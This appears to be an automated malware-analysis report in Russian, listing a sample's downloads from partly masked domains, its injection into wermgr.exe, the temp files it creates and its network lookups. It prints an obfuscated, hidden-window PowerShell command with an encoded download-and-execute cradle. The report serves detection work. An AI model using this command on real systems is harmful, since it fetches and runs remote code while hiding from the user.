Техническая информация
Вредоносные функции
Загружает
- http://www.wo###sily.com/accounts/webbrowser.php
Внедряет код в
следующие системные процессы:
- <SYSTEM32>\wermgr.exe
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\387-.exe
- %TEMP%\loge169.tmp
Удаляет следующие файлы
- %TEMP%\loge169.tmp
Сетевая активность
TCP
Запросы HTTP GET
- http://www.wo###sily.com/accounts/webbrowser.php
- http://ar###arena.com/WebBrowseHttp.exe
- http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
UDP
- DNS ASK wo###sily.com
- DNS ASK ar###arena.com
- DNS ASK microsoft.com
- DNS ASK id##t.me
- DNS ASK 19#.###.#11.95.zen.spamhaus.org
- DNS ASK 19#.###.#11.95.cbl.abuseat.org
Другое
Создает и запускает на исполнение
- '%TEMP%\387-.exe'
- '%WINDIR%\syswow64\cmd.exe' /c pOW^erShel^L -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8Adw...' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\syswow64\cmd.exe' /c pOW^erShel^L -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8Adw...
- '<SYSTEM32>\wermgr.exe'
